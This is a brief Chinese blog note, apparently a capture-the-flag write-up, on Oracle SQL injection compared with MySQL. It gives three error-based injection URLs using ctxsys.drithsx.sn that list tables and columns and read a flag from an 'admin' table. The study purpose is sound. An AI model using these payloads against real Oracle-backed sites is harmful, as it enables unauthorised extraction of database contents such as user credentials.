Oracle注入和mysql注入区别在于一些语句不同
比如联合查询不能用123查询 中间需要用NULL隔开
查表
?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))--+
查列然后一个一个找
?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1 and column_name<>'ID' AND column_name<>'USER_NAME' AND column_name<>'PASSWORD'))--+
查flag
?id=1' and 1=ctxsys.drithsx.sn(1,(select FLAG_FLAG from admin))--+
打赏我,让我更有动力~
© 2016 - 2022 掌控者 All Rights Reserved.